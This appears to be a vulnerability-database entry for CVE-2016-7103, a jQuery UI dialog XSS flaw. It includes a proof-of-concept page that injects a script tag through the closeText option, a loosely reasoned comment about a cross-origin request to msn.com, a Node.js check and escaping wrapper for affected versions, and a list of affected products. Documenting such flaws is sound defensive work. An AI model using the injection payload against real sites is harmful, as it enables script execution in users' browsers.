CVE-2016-7103
Description
Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.
Ratings
- Attacker Value: Low
- Exploitability: High
Technical Analysis
PoC:
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>XSS in closeText option of component ui dialog</title>
<script src="https://code.jquery.com/jquery-2.1.4.js"></script>
<script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css">
<script>
$(document).ready(function () {
  $('#dialog').dialog({ closeText: '<script>alert("XSS")<\/script>' }); // This is the attack point where you can inject code
  // if the CORS/CSP policy is not configured or set up wrong, try a jQuery vuln using $.ajax('https://www.msn.com/robots.txt');
  // if it says onready:1 expand it you should see msn.com's robots file
  // this is a double whammy of vulnerability in the target
});
</script>
</head>
<body>
<div id="dialog" title="Dialog Title">Content here!</div>
</body>
</html>
Positives: Easy, can potentially execute scripts off remote sites
Negatives: Would likely require user intervention, social engineering or phishing to make this persistent or of real use
Document on how the dialog function is used in jQuery – https://www.tutorialspoint.com/jqueryui/jqueryui_dialog.htm
Here is a link to a site that will prove which jquery exploits are vuln. to which version (specific to jQuery not UI) – https://research.insecurelabs.org/jquery/test/
More info on exploit and poc: https://vuldb.com/?id.98137
dj substance
https://tranceattic.com
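Added example (not part of the assessment above and not jQuery UI's own code): a Node.js check that finds jQuery UI script includes in page source, flags versions before 1.12.0 as stated in the CVE description, and escapes a closeText value for those builds. The `/ui/<version>/jquery-ui.js` path layout follows the PoC's code.jquery.com includes; the function names and sample HTML are constructed for illustration.

```javascript
// Added example; names and sample data are constructed for illustration.
const FIXED = [1, 12, 0]; // CVE-2016-7103 affects jQuery UI before 1.12.0

// "1.11.4" -> [1, 11, 4]; null for anything that is not exactly x.y.z
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(String(v).trim());
  return m ? m.slice(1).map(Number) : null;
}

// True when the version is below 1.12.0. Unparseable or pre-release
// strings are treated as affected (fail closed).
function isAffected(version) {
  const v = parseVersion(version);
  if (!v) return true;
  for (let i = 0; i < 3; i++) {
    if (v[i] !== FIXED[i]) return v[i] < FIXED[i];
  }
  return false;
}

// List jQuery UI <script> includes found in HTML source.
// Assumes the /ui/<version>/jquery-ui(.min).js path layout seen in the PoC.
function findJqueryUi(html) {
  const re = /<script[^>]+src=["']([^"']*\/ui\/([^\/"']+)\/jquery-ui(?:\.min)?\.js)["']/gi;
  return [...html.matchAll(re)].map((m) => ({
    src: m[1], version: m[2], affected: isAffected(m[2]),
  }));
}

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Value to hand to dialog({ closeText }). Escaped only on affected builds;
// fixed builds are left alone so the text is not escaped twice.
// In a browser, pass $.ui.version as uiVersion.
function safeCloseText(uiVersion, text) {
  return isAffected(uiVersion) ? escapeHtml(text) : String(text);
}

// Constructed sample page source: one affected include, one fixed.
const SAMPLE = [
  '<script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>',
  '<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js"></script>',
].join('\n');

for (const hit of findJqueryUi(SAMPLE)) {
  console.log(hit.affected ? 'AFFECTED' : 'ok', hit.version, hit.src);
}
```

Upgrading to 1.12.0 or later removes the need for the wrapper; the escape is a stopgap for pages that must stay on an older build and pass untrusted text to closeText.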
General Information
Vendors
- debian
- fedoraproject
- jqueryui
- juniper
- netapp
- oracle
- redhat
Products
- application express
- business intelligence 12.2.1.3.0
- business intelligence 12.2.1.4.0
- debian linux 9.0
- fedora 30
- fedora 35
- fedora 36
- hospitality cruise fleet management 9.0.11
- jquery ui
- junos 21.2
- openstack 7.0
- openstack 8
- openstack 9
- oss support tools
- oss support tools 2.12.42
- primavera unifier
- siebel ui framework
- snapcenter -
- weblogic server 10.3.6.0.0
- weblogic server 12.1.3.0.0
- weblogic server 12.2.1.3.0